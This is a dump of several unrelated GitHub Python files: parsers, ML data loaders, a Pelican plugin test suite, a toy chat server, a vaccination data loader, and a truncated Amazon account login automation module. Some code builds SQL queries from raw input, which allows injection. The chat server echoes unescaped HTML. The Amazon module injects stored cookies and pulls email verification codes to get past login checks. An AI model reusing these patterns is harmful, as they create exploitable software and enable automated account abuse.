self.nouns['singular'] = left\n self.nouns['plural'] = right\n\n def addNames(self):\n\n names = {}\n\n # shortened height of wordList\n wordList = self.wordList[\n self.wordList.index('NAMES\\n'):\n self.wordList.index(' OTHER\\n')]\n\n # special names\n names['special'] = [\n name.strip().replace('_', ' ')\n for name in filter(lambda word: not word.isupper(),\n wordList)]\n\n # re-shortened for other names\n wordList = self.wordList[\n self.wordList.index(' OTHER\\n'):\n self.wordList.index('ARTICLES\\n')]\n\n names['other'] = [\n name.strip().replace('_', ' ')\n for name in filter(lambda word: not word.isupper(),\n wordList)]\n\n self.names = names\n\n def getVerbs(self):\n\n # let's first condense our list. . 
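        # Illustration with invented data: for
        # verbList = ["SINGULAR\n", "go went\n", "PLURAL\n", "go went\n"],
        # the marker scan below ends with IndPlu == {"SINGULAR": 0,
        # "PLURAL": 2}, and slicing between those indices isolates the
        # singular block.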
.\n start, end = (\n self.wordList.index('VERBS\\n'),\n self.wordList.index('NAMES\\n'))\n\n verbList = self.wordList[start: end]\n\n # { plurality: index }\n IndPlu = {\n 'SINGULAR': 0,\n 'PLURAL': 0}\n\n for i, value in enumerate(verbList):\n for key in IndPlu:\n if key in value:\n IndPlu[key] = i\n\n # let's condense our list for the singulars\n littleList = verbList[IndPlu['SINGULAR']: IndPlu['PLURAL']]\n\n # { person, index }\n IndPerson = {\n 'FIRST': 0,\n 'SECOND': 0,\n 'THIRD': 0}\n\n for i, value in enumerate(littleList):\n for key in IndPerson:\n if key in value:\n IndPerson[key] = i\n\n verbs = self.verbs\n # SINGULAR\n # FIRST\n for lines in littleList[IndPerson['FIRST']+2: IndPerson['SECOND']]:\n lines = lines.split()\n verbs['singular']['first']['past'].append(\n lines[0].replace('_', ' '))\n verbs['singular']['first']['present'].append(\n lines[1].replace('_', ' '))\n verbs['singular']['first']['future'].append(\n lines[2].replace('_', ' '))\n\n # SECOND\n for lines in littleList[IndPerson['SECOND']+2: IndPerson['THIRD']]:\n lines = lines.split()\n verbs['singular']['second']['past'].append(\n lines[0].replace('_', ' '))\n verbs['singular']['second']['present'].append(\n lines[1].replace('_', ' '))\n verbs['singular']['second']['future'].append(\n lines[2].replace('_', ' '))\n\n # THIRD\n for lines in littleList[IndPerson['THIRD']+2: IndPlu['PLURAL']]:\n lines = lines.split()\n verbs['singular']['third']['past'].append(\n lines[0].replace('_', ' '))\n verbs['singular']['third']['present'].append(\n lines[1].replace('_', ' '))\n verbs['singular']['third']['future'].append(\n lines[2].replace('_', ' '))\n\n # PLURAL\n\n # let's condense our list for the singulars\n littleList = verbList[IndPlu['PLURAL']: len(verbList)]\n\n # { person, index }\n IndPerson = {\n 'FIRST': 0,\n 'SECOND': 0,\n 'THIRD': 0}\n\n for i, value in enumerate(littleList):\n for key in IndPerson:\n if key in value:\n IndPerson[key] = i\n\n # FIRST\n for lines in littleList[IndPerson['FIRST']+2: IndPerson['SECOND']]:\n lines = lines.split()\n verbs['plural']['first']['past'].append(lines[0].replace('_', ' '))\n verbs['plural']['first']['present'].append(\n lines[1].replace('_', ' '))\n verbs['plural']['first']['future'].append(\n lines[2].replace('_', ' '))\n\n # SECOND\n for lines in littleList[IndPerson['SECOND']+2: IndPerson['THIRD']]:\n lines = lines.split()\n verbs['plural']['second']['past'].append(lines[0].replace('_', ' '))\n verbs['plural']['second']['present'].append(\n lines[1].replace('_', ' '))\n verbs['plural']['second']['future'].append(\n lines[2].replace('_', ' '))\n\n # THIRD\n for lines in littleList[IndPerson['THIRD']+2: IndPlu['PLURAL']]:\n lines = lines.split()\n verbs['plural']['third']['past'].append(lines[0].replace('_', ' '))\n verbs['plural']['third']['present'].append(\n lines[1].replace('_', ' '))\n verbs['plural']['third']['future'].append(\n lines[2].replace('_', ' '))\n\n return verbs\n\n\nwordShelf = WordShelf()\n","repo_name":"JustenRickert/PythonStory","sub_path":"words/wordShelf.py","file_name":"wordShelf.py","file_ext":"py","file_size_in_byte":8126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28856510447","text":"from abc import ABC, abstractmethod\nfrom typing import Any, Callable, Tuple\n\nimport numpy as np\n\n\nclass DataLoader(ABC):\n @abstractmethod\n def get_data_batch(self, batch_size: int) -> Any:\n \"\"\"\n :param batch_size: how many data do you want\n :return: batch of data\n \"\"\"\n 
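        # Concrete strategies live in the subclasses below: NumpyDataLoader
        # slices preloaded arrays, GeneratorBasedLoader draws samples from a
        # callable, and StubDataLoader returns a fixed placeholder.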
pass\n\n\nclass NumpyDataLoader(DataLoader):\n def __init__(self, data: np.ndarray, labels: np.ndarray, shuffle: bool = False):\n permutation = (\n np.random.permutation(data.shape[0])\n if shuffle\n else np.arange(data.shape[0])\n )\n self.__data__ = data.copy()[permutation]\n self.__labels__ = np.array(labels.copy())[permutation]\n self.__current_index__ = 0\n\n def get_data_batch(self, batch_size: int) -> Tuple[np.ndarray, np.ndarray]:\n left = self.__current_index__\n self.__current_index__ += batch_size\n return (\n self.__data__[\n left : self.__current_index__,\n ],\n self.__labels__[left : self.__current_index__],\n )\n\n\nclass GeneratorBasedLoader(DataLoader):\n def __init__(self, generator_func: Callable[[], Tuple[Any, Any]]):\n \"\"\"\n :param generator_func:\n :param calc_shapes_on_init:\n \"\"\"\n self.__generator_func__ = generator_func\n\n def get_data_batch(self, batch_size: int) -> Tuple[np.ndarray, np.ndarray]:\n data = []\n target = []\n for _ in range(batch_size):\n current_data, current_target = self.__generator_func__()\n data.append(current_data)\n target.append(current_target)\n return np.array(data), np.array(target)\n\n\nclass StubDataLoader(DataLoader):\n def __init__(self):\n self.__stub__ = np.array([0])\n\n def get_data_batch(self, batch_size: int) -> Tuple[np.ndarray, np.ndarray]:\n return self.__stub__, self.__stub__\n","repo_name":"kokamido/TryToMakeSmthng","sub_path":"MyML/DataPipelineTools/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6018149587","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# \n \nimport sys\n\n\ndef __str__():\n\treturn \t\"eu faço médias\"\n\n\ndef media(valores):\n\tmedia \t= 0.0\n\tsoma \t= 0.0\n\n\tfor i in range(1,len(valores)):\n\t\tsoma += float(valores[i])\n\n\treturn soma/(len(valores)-1)\n\n \ndef processador(args):\n\n # print(args[0]) #o argumento na posição 0 é o nome do script\n \n print(\"A média dos valores:\\n\")\n \n for i in range(1,len(args)):\n \tprint(args[i])\n\n print(\"\\nÉ...\",str(media(args)))\n \n return 0\n \n\n\n\nif __name__ == '__main__':\n sys.exit(processador(sys.argv))","repo_name":"rafaelstojoao/python4dataScience","sub_path":"codigosDeepNote/Aula_02 - Classes Módulos e Pacotes/scriptARGS.py","file_name":"scriptARGS.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70423124266","text":"from db_connect_oop import *\n # employees_table = NWEmployees()\n\nclass NWEmployees(MSDBConnection):\n\n def __sql_query(self, sql_query): # Makes it private\n return self.cursor.execute(sql_query)\n\n# Get all employee data\n def emp_read_all(self):\n query = \"SELECT * FROM Employees\"\n data = self.__sql_query(query)\n return data\n\n# Get one employee by id\n def emp_read_one(self, id):\n query = f\"SELECT * FROM Employees WHERE EmployeeID = {id}\"\n data = self.__sql_query(query)\n return data\n\n# Search for one employee by name or LastName\n def search_emp_by_name(self, last_name):\n query = f\"SELECT * FROM Employees WHERE LastName LIKE '%{last_name}%'\"\n data = self.__sql_query(query)\n while True:\n row = data.fetchone()\n if row is None:\n break\n print(f\"ID: {row.EmployeeID} // {row.TitleOfCourtesy} {row.FirstName} {row.LastName} - {row.Title} // Address: {row.Address} {row.PostalCode}, {row.City} // Phone: {row.HomePhone} // DOB: 
{row.BirthDate}\")\n\n # create an employee\n def create_employee(self, first_name, last_name):\n query = f\"INSERT INTO Employees (FirstName, LastName) VALUES ('{first_name}', '{last_name}')\"\n data_to_insert = self.__sql_query(query)\n self.docker_Northwind.commit()\n return data_to_insert\n\n\n# Add all this funtionality to our run products while loop\n\n# employee = NWEmployees().emp_read_one(4)\n# print(employee.fetchone())\n\n# employee = NWEmployees().search_emp_by_name('Fuller')\n","repo_name":"Daniel-Chow-YC/eng-48-pyodbc-connection","sub_path":"db_employees_oop.py","file_name":"db_employees_oop.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70575400106","text":"import sqlite3\r\nfrom os.path import exists\r\nimport os\r\n#You can always get the latest update from the link below and make sure to put the cvl file in the same directory\r\n#https://www.kaggle.com/gpreda/covid-world-vaccination-progress\r\n\r\ndef parsenumber(number) :\r\n number=str(number)\r\n number=number.split('.')[0].strip()\r\n number=list(number)\r\n out=number\r\n last3=[]\r\n while len(number)>3 :\r\n last3=number[-3:]+last3\r\n last3.insert(0,',')\r\n del number[-3:]\r\n out=number+last3\r\n return listtostr(out)\r\n\r\ndef listtostr(list) :\r\n str=''\r\n for element in list :\r\n str+=element\r\n return str\r\n\r\n\r\ndef parsedata(cline) :\r\n date=cline[2]\r\n vaccinated=parsenumber(cline[4])\r\n f_vaccinated=parsenumber(cline[5])\r\n dv=parsenumber(cline[6])\r\n vaccinated_ph=cline[9]\r\n f_vaccinated_ph=cline[10]\r\n vaccine=cline[12]\r\n if cline[12].startswith('\"') : #countries which have several vaccines\r\n sindex=13\r\n while True:\r\n text=cline[sindex]\r\n vaccine=vaccine+text\r\n if text.endswith('\"') :\r\n source_name=cline[sindex+1]\r\n break\r\n else :\r\n sindex+=1\r\n else :\r\n source_name=cline[13]\r\n\r\n global k_vaccinated\r\n global k_f_vaccinated\r\n global k_vaccinated_ph\r\n global k_f_vaccinated_ph\r\n\r\n #keep the latest data if country doesn't publish new data\r\n if len(vaccinated)<1 :\r\n vaccinated=k_vaccinated\r\n else :\r\n k_vaccinated=vaccinated\r\n\r\n if len(f_vaccinated)<1 :\r\n f_vaccinated=k_f_vaccinated\r\n else :\r\n k_f_vaccinated=f_vaccinated\r\n\r\n if len(dv) < 1 : dv=None\r\n\r\n if len(vaccinated_ph)<1 :\r\n vaccinated_ph=k_vaccinated_ph\r\n else :\r\n k_vaccinated_ph=vaccinated_ph\r\n\r\n if len(f_vaccinated_ph)<1 :\r\n f_vaccinated_ph=k_f_vaccinated_ph\r\n else :\r\n k_f_vaccinated_ph=f_vaccinated_ph\r\n\r\n return (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)\r\n\r\n#if exists('vaccination_data.sqlite') : os.remove('vaccination_data.sqlite')\r\nconn=sqlite3.connect('vaccination_data.sqlite')\r\ncur=conn.cursor()\r\n\r\ncur.executescript('''\r\n DROP TABLE IF EXISTS Vaccine;\r\n DROP TABLE IF EXISTS Daily;\r\n\r\n CREATE TABLE IF NOT EXISTS Vaccine(\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n Country TEXT UNIQUE,\r\n Vaccines TEXT,\r\n Source TEXT\r\n );\r\n CREATE TABLE IF NOT EXISTS Daily(\r\n Country_id INTEGER,\r\n Vaccinated REAL,\r\n Fully_Vaccinated REAL,\r\n Daily_Vaccinated REAL,\r\n \"Vaccinated(%)\" REAL,\r\n \"Fully_Vaccinated(%)\" REAL,\r\n Date TEXT\r\n );\r\n CREATE TABLE IF NOT EXISTS Geodata(\r\n Country_id INTEGER,\r\n geo TEXT NULL\r\n 
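            -- filled in separately (the script's closing note says to run
            -- geoload.py to populate this column)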
)''')\r\n\r\nhandle=open('country_vaccinations.csv')\r\nlinelist=list()\r\n\r\nk_vaccinated=None\r\nk_f_vaccinated=None\r\nk_vaccinated_ph=None\r\nk_f_vaccinated_ph=None\r\n\r\n\r\nfor line in handle :\r\n linelist.append(line)\r\n\r\nfirstline=True #first line realted to a country\r\ncount=0\r\nfor i in range(len(linelist)) :\r\n count+=1\r\n if i == 0 : continue #omitting the first line\r\n infos=linelist[i].split(',')\r\n if firstline :\r\n country=infos[0]\r\n print('Retrieving data related to: ',country)\r\n cur.execute('INSERT INTO Vaccine (Country) VALUES (?)',(country,))\r\n cur.execute('SELECT id FROM Vaccine WHERE Country=?',(country,))\r\n country_id=cur.fetchone()[0]\r\n datas=parsedata(infos)\r\n (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)=datas\r\n cur.execute('''\r\n INSERT INTO Daily (Country_id,Vaccinated,Fully_Vaccinated,Daily_Vaccinated,\"Vaccinated(%)\",\"Fully_Vaccinated(%)\",Date) VALUES\r\n (?,?,?,?,?,?,?)''',(country_id,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,date))\r\n firstline=False\r\n try :\r\n if linelist[i+1].startswith(country) : #not the last line for a country\r\n datas=parsedata(infos)\r\n (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)=datas\r\n cur.execute('''\r\n INSERT INTO Daily (Country_id,Vaccinated,Fully_Vaccinated,Daily_Vaccinated,\"Vaccinated(%)\",\"Fully_Vaccinated(%)\",Date) VALUES\r\n (?,?,?,?,?,?,?)''',(country_id,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,date))\r\n\r\n else : #the last line of the csv file\r\n raise IndexError\r\n except IndexError :\r\n firstline=True\r\n\r\n datas=parsedata(infos)\r\n (date,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,vaccine,source_name)=datas\r\n\r\n cur.execute('''\r\n INSERT INTO Daily (Country_id,Vaccinated,Fully_Vaccinated,Daily_Vaccinated,\"Vaccinated(%)\",\"Fully_Vaccinated(%)\",Date) VALUES\r\n (?,?,?,?,?,?,?)''',(country_id,vaccinated,f_vaccinated,dv,vaccinated_ph,f_vaccinated_ph,date))\r\n\r\n cur.execute('UPDATE Vaccine SET Vaccines=? , Source=? WHERE id=?',(vaccine,source_name,country_id))\r\n\r\n k_vaccinated=None\r\n k_f_vaccinated=None\r\n k_vaccinated_ph=None\r\n k_f_vaccinated_ph=None\r\n\r\n if count%50==0 : conn.commit()\r\nconn.commit()\r\nprint('Finished with getting data from csv file, run geoload.py to fill up geodata column.')\r\n\r\n#you can run the command below in your sqlite browser if you want\r\n\r\n#SELECT Vaccine.Country,Daily.Vaccinated,Daily.Fully_Vaccinated,Daily.\"Vaccinated(%)\",Daily.\"Fully_Vaccinated(%)\",max(Date),Vaccine.Vaccines\r\n#FROM Vaccine JOIN Daily ON Vaccine.id=Daily.Country_id\r\n#GROUP BY Country_id\r\n#ORDER BY \"Fully_Vaccinated(%)\" DESC\r\n","repo_name":"amirrezamsh/covid-19","sub_path":"vaccine_database.py","file_name":"vaccine_database.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36413845030","text":"'''Unit tests for the i18n_subsites plugin'''\n\nimport os\nimport locale\nimport unittest\nimport subprocess\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\n\nfrom . 
import i18n_subsites as i18ns\nfrom pelican import Pelican\nfrom pelican.tests.support import get_settings\nfrom pelican.settings import read_settings\n\n\nclass TestTemporaryLocale(unittest.TestCase):\n '''Test the temporary locale context manager'''\n\n def test_locale_restored(self):\n '''Test that the locale is restored after exiting context'''\n orig_locale = locale.setlocale(locale.LC_ALL)\n with i18ns.temporary_locale():\n locale.setlocale(locale.LC_ALL, 'C')\n self.assertEqual(locale.setlocale(locale.LC_ALL), 'C')\n self.assertEqual(locale.setlocale(locale.LC_ALL), orig_locale)\n\n def test_temp_locale_set(self):\n '''Test that the temporary locale is set'''\n with i18ns.temporary_locale('C'):\n self.assertEqual(locale.setlocale(locale.LC_ALL), 'C')\n\n\nclass TestSettingsManipulation(unittest.TestCase):\n '''Test operations on settings dict'''\n\n def setUp(self):\n '''Prepare default settings'''\n self.settings = get_settings()\n\n def test_get_pelican_cls_class(self):\n '''Test that we get class given as an object'''\n self.settings['PELICAN_CLASS'] = object\n cls = i18ns.get_pelican_cls(self.settings)\n self.assertIs(cls, object)\n \n def test_get_pelican_cls_str(self):\n '''Test that we get correct class given by string'''\n cls = i18ns.get_pelican_cls(self.settings)\n self.assertIs(cls, Pelican)\n \n\nclass TestSitesRelpath(unittest.TestCase):\n '''Test relative path between sites generation'''\n\n def setUp(self):\n '''Generate some sample siteurls'''\n self.siteurl = 'http://example.com'\n i18ns._SITE_DB['en'] = self.siteurl\n i18ns._SITE_DB['de'] = self.siteurl + '/de'\n\n def tearDown(self):\n '''Remove sites from db'''\n i18ns._SITE_DB.clear()\n\n def test_get_site_path(self):\n '''Test getting the path within a site'''\n self.assertEqual(i18ns.get_site_path(self.siteurl), '/')\n self.assertEqual(i18ns.get_site_path(self.siteurl + '/de'), '/de')\n\n def test_relpath_to_site(self):\n '''Test getting relative paths between sites'''\n self.assertEqual(i18ns.relpath_to_site('en', 'de'), 'de')\n self.assertEqual(i18ns.relpath_to_site('de', 'en'), '..')\n\n \nclass TestRegistration(unittest.TestCase):\n '''Test plugin registration'''\n\n def test_return_on_missing_signal(self):\n '''Test return on missing required signal'''\n i18ns._SIGNAL_HANDLERS_DB['tmp_sig'] = None\n i18ns.register()\n self.assertNotIn(id(i18ns.save_generator),\n i18ns.signals.generator_init.receivers)\n\n def test_registration(self):\n '''Test registration of all signal handlers'''\n i18ns.register()\n for sig_name, handler in i18ns._SIGNAL_HANDLERS_DB.items():\n sig = getattr(i18ns.signals, sig_name)\n self.assertIn(id(handler), sig.receivers)\n # clean up\n sig.disconnect(handler)\n \n\nclass TestFullRun(unittest.TestCase):\n '''Test running Pelican with the Plugin'''\n\n def setUp(self):\n '''Create temporary output and cache folders'''\n self.temp_path = mkdtemp(prefix='pelicantests.')\n self.temp_cache = mkdtemp(prefix='pelican_cache.')\n\n def tearDown(self):\n '''Remove output and cache folders'''\n rmtree(self.temp_path)\n rmtree(self.temp_cache)\n\n def test_sites_generation(self):\n '''Test generation of sites with the plugin\n\n Compare with recorded output via ``git diff``.\n To generate output for comparison run the command\n ``pelican -o test_data/output -s test_data/pelicanconf.py \\\n test_data/content``\n Remember to remove the output/ folder before that.\n '''\n base_path = os.path.dirname(os.path.abspath(__file__))\n base_path = os.path.join(base_path, 'test_data')\n content_path = 
os.path.join(base_path, 'content')\n output_path = os.path.join(base_path, 'output')\n settings_path = os.path.join(base_path, 'pelicanconf.py')\n settings = read_settings(path=settings_path, override={\n 'PATH': content_path,\n 'OUTPUT_PATH': self.temp_path,\n 'CACHE_PATH': self.temp_cache,\n 'PLUGINS': [i18ns],\n }\n )\n pelican = Pelican(settings)\n pelican.run()\n\n # compare output\n out, err = subprocess.Popen(\n ['git', 'diff', '--no-ext-diff', '--exit-code', '-w', output_path,\n self.temp_path], env={'PAGER': ''},\n stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n self.assertFalse(out, 'non-empty `diff` stdout:\\n{}'.format(out))\n self.assertFalse(err, 'non-empty `diff` stderr:\\n{}'.format(err))\n","repo_name":"getpelican/pelican-plugins","sub_path":"i18n_subsites/test_i18n_subsites.py","file_name":"test_i18n_subsites.py","file_ext":"py","file_size_in_byte":5011,"program_lang":"python","lang":"en","doc_type":"code","stars":1367,"dataset":"github-code","pt":"37"} +{"seq_id":"40866962485","text":"def count_paths_with_obstacles(m, n, obstacles):\n # Create a 2D array to store the number of paths to each point\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n\n # Initialize the starting point\n dp[0][0] = 1\n\n # Mark obstacles\n for obstacle in obstacles:\n if obstacle[0] <= m and obstacle[1] <= n:\n dp[obstacle[0]][obstacle[1]] = -1\n\n # Update the number of paths for each point\n for i in range(m + 1):\n for j in range(n + 1):\n if dp[i][j] != -1:\n if i > 0 and dp[i - 1][j] != -1:\n dp[i][j] += dp[i - 1][j]\n if j > 0 and dp[i][j - 1] != -1:\n dp[i][j] += dp[i][j - 1]\n\n # Return the number of paths to the bottom-right corner\n return dp[m][n]\n\n# Define the grid size\nm, n = 18, 19 # Adjusted grid size to cover all obstacle points\n\n# Define the obstacles\nobstacles = [(1, 3), (3, 3), (3, 6), (4, 3), (6, 4), (6, 6), (14, 12)]\n\n# Check the given statements\nstatements = [\n (1, 1, 2),\n (2, 3, 7),\n (5, 5, 51),\n (6, 7, 115),\n (8, 7, 736),\n (7, 8, 551),\n (13, 12, 883023),\n (15, 16, 37963602),\n (17, 18, 592095012)\n]\n\nfor statement in statements:\n x, y, expected_paths = statement\n actual_paths = count_paths_with_obstacles(x, y, obstacles)\n is_true = actual_paths == expected_paths\n print(f\"There are {actual_paths} paths to ({x},{y}): {is_true}\")\n","repo_name":"nurlanyagublu/Modelling-Seminar","sub_path":"Compression of IP forwarding tables Practice/def count_paths_with_obstacles(m, n, obs.py","file_name":"def count_paths_with_obstacles(m, n, obs.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26227769882","text":"import http.server\nimport urllib.parse\nimport uuid\nimport datetime\nimport argparse\n\n\nclass ChatHandler(http.server.BaseHTTPRequestHandler):\n messages = []\n\n def write_response(self):\n messages = [\n \"\"\"\n
<div class=\"message\">\n <span class=\"received\">{received}</span>\n <span class=\"name\">{name}</span>\n <span class=\"text\">{message}</span>\n
</div>\n \"\"\".format_map(\n {**f, \"received\": t}\n )\n for f, t in self.messages\n ]\n message_log = \"\\n\".join(messages)\n contents = f\"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n<meta charset=\"utf-8\">\n<title>wingpings</title>\n</head>\n<body>\n
<div id=\"log\">\n { message_log }\n</div>\n
<form method=\"post\">\n
<input name=\"name\" placeholder=\"name\">\n <input name=\"message\" placeholder=\"message\">\n <input type=\"submit\" value=\"send\">\n</form>\n</body>\n</html>
\n\n \"\"\"\n response = \"\\n\".join(\n [\"HTTP/1.1 200 OK\", \"Content-type: text/html\", \"\", contents]\n )\n self.wfile.write(response.encode())\n\n def parse_form(self, content):\n raw_items = [l.split(\"=\", 1) for l in content.split(\"&\")]\n items = [\n (urllib.parse.unquote_plus(k), urllib.parse.unquote_plus(v))\n for (k, v) in raw_items\n ]\n return dict(items)\n\n def handle_message(self, message):\n if not self.messages or message != self.messages[-1][0]:\n self.messages.append((message, datetime.datetime.now().time()))\n\n def do_GET(self):\n self.write_response()\n\n def do_POST(self):\n n_bytes = int(self.headers[\"Content-Length\"])\n form_data = self.rfile.read(n_bytes).decode()\n form = self.parse_form(form_data)\n\n self.handle_message(form)\n self.write_response()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"host\", default=\"0.0.0.0\")\n parser.add_argument(\"port\", default=8000, type=int)\n args = parser.parse_args()\n\n server = http.server.HTTPServer((args.host, args.port), ChatHandler)\n print(f\"Serving on http://{args.host}:{args.port}\")\n server.serve_forever()\n","repo_name":"agoose77/wingpings","sub_path":"wingpings.py","file_name":"wingpings.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70576474987","text":"from bs4 import BeautifulSoup as bs\nfrom pprint import pprint\nimport requests\nimport csv\n\ndaum_url = 'https://www.daum.net/'\n\nresponse = requests.get(daum_url).text\n# print(response)\ndata = bs(response, 'html.parser')\n# print(data)\n\nrankings = data.select('#mArticle > div.cmain_tmp > div.section_media > div.hot_issue.issue_mini > div.hotissue_mini > ol > li> div > div > span.txt_issue > a')\n# print(rankings)\n\nranking_dict = {}\nranking_list = []\n\nfor idx, ranking in enumerate(rankings, start=1):\n # print(f'{idx}위 : {ranking.text}')\n # ranking_dict[f'{idx}위'] = ranking.text\n ranking_dict = {'rank': f'{idx}위', 'ranker': ranking.text}\n ranking_list.append(ranking_dict)\n\n# pprint(ranking_list)\n\nwith open('daum_rank.csv', 'w', encoding='utf-8', newline='') as csvfile:\n # csv_writer = csv.writer(csvfile)\n #1. 저장할 데이터의 필드 이름을 미리 지정한다. \n fieldnames = ('rank', 'ranker')\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n #2. 
필드 이름을 csv 최상단에 작성한다.\n writer.writeheader()\n\n for ranking in ranking_list:\n # ranking -> dict\n writer.writerow(ranking)","repo_name":"lymchgmk/Algorithm-Problem-Solving","sub_path":"SSAFY/Python_lecture/lectures-justin-master/Python/file_operations/daum_rankings.py","file_name":"daum_rankings.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36472497697","text":"#coding=utf-8\r\nimport sys\r\nimport browser as bo\r\nimport time\r\nfrom util import CidTransfer\r\nfrom db.SQLModel import Record2DB\r\nfrom logs.log import Logger\r\nfrom mail_auth.mailauth_handler import MailServer\r\nreload(sys)\r\nsys.setdefaultencoding('utf-8')\r\nL = Logger(__file__)\r\nRdb = Record2DB()\r\n\r\n\r\nclass Login(object):\r\n def __init__(self, driver, conf):\r\n self.d = driver\r\n self.conf = conf\r\n self.url = 'https://' + CidTransfer(conf.cid).value\r\n\r\n\r\n def login_with_cookie(self):\r\n self.d.request(self.url)\r\n self.d.to_first_handler()\r\n self.d.delete_cookies()\r\n if self.addCookies():\r\n self.d.refresh_page()\r\n if self.conf.cid in (2, 5):\r\n user_xpath = '//a[@id=\"nav-link-yourAccount\"]/span[contains(text(), \"%s\")]' % self.conf.name\r\n elif self.conf.cid in (1, 3, 4, 6, 7, 8):\r\n user_xpath = '//a[@id=\"nav-link-accountList\"]/span[contains(text(), \"%s\")]' % self.conf.name\r\n else:\r\n user_xpath = ''\r\n L.error('Wrong params \"contry id\": %s' % self.conf.cid)\r\n if self.d.is_element_exist(user_xpath):\r\n L.info('带cookie账号登录成功')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '带cookie登录成功')\r\n bo.update_cookie_to_db(self.d, self.conf.task_guid, self.conf.user, '账号登录')\r\n return True\r\n else:\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '带cookie登录失败')\r\n L.error('带cookie账号登录失败')\r\n return False\r\n else:\r\n L.error(' cookie添加失败, 代理网速太慢')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '登录失败, 代理网速太慢')\r\n return False\r\n\r\n def login_by_click(self):\r\n login_xpath = str()\r\n if self.conf.cid in (2, 5):\r\n login_xpath = '//a[@id=\"nav-link-yourAccount\"]'\r\n elif self.conf.cid in (1, 3, 4, 6, 7, 8):\r\n login_xpath = '//a[@id=\"nav-link-accountList\"]'\r\n u_xpath = '//input[@id=\"ap_email\"]'\r\n p_xpath = '//input[@id=\"ap_password\"]'\r\n ctn = '//input[@id=\"continue\"]'\r\n sub_xpath = '//input[@id=\"signInSubmit\"]'\r\n self.d.request(self.url)\r\n self.d.to_first_handler()\r\n # self.d.delete_cookies()\r\n # self.addCookies()\r\n self.d.wait_clickable(login_xpath)\r\n self.d.rand_move()\r\n self.d.click_opt(login_xpath)\r\n if not self.d.is_element_exist(u_xpath) and self.d.is_element_exist(p_xpath):\r\n self.d.wait_clickable(sub_xpath)\r\n self.d.send_key(p_xpath, self.conf.pw)\r\n self.d.click_opt(sub_xpath)\r\n else:\r\n self.d.wait(u_xpath)\r\n self.d.send_key(u_xpath, self.conf.user)\r\n if self.d.is_element_exist(p_xpath):\r\n self.d.wait_clickable(sub_xpath)\r\n self.d.send_key(p_xpath, self.conf.pw)\r\n self.d.click_opt(sub_xpath)\r\n else:\r\n self.d.wait_clickable(ctn)\r\n self.d.click_opt(ctn)\r\n self.d.wait(p_xpath)\r\n self.d.wait_clickable(sub_xpath)\r\n self.d.send_key(p_xpath, self.conf.pw)\r\n self.d.click_opt(sub_xpath)\r\n # for i in range(50):\r\n # time.sleep(1)\r\n # print i\r\n # 判断是否登录成功,如果成功则保存cookies\r\n if self.d.is_element_exist('//input[@id=\"continue\"]'):\r\n L.error(' 登录失败, 要验证码或邮箱验证')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '登录失败, 
要验证码或邮箱验证')\r\n if self.check_mail_auth():\r\n auth = self.get_auth()\r\n if auth:\r\n if self.input_auth(auth):\r\n bo.update_cookie_to_db(self.d, self.conf.task_guid, self.conf.user, '账号登录')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '邮箱验证登录成功')\r\n return True\r\n else:\r\n L.error('邮箱验证码提交失败')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '邮箱验证码提交失败')\r\n return False\r\n else:\r\n L.error('未从邮箱获取到验证码')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '未从邮箱提取到验证码')\r\n return False\r\n else:\r\n L.error('需要手动验证码或者账号可能被封,请检查')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '需要手动验证码或者账号可能被封,请检查')\r\n return False\r\n else:\r\n bo.update_cookie_to_db(self.d, self.conf.task_guid, self.conf.user, '账号登录')\r\n Rdb.insert_log(self.conf.task_guid, self.conf.user, '账号登录', '登录成功')\r\n return True\r\n\r\n def addCookies(self):\r\n try:\r\n table = 'account_cookies'\r\n field = ['cookies']\r\n where = \"account='%s'\" % self.conf.user\r\n ck = Rdb.search_(table, field, where)\r\n if len(ck):\r\n cookie = ck[0][0].replace(\"´\", \"'\")\r\n # print type(eval(cookie)), eval(cookie)\r\n if self.d.add_cookies_to_bs(eval(cookie)):\r\n L.info('浏览器cookie设置成功')\r\n 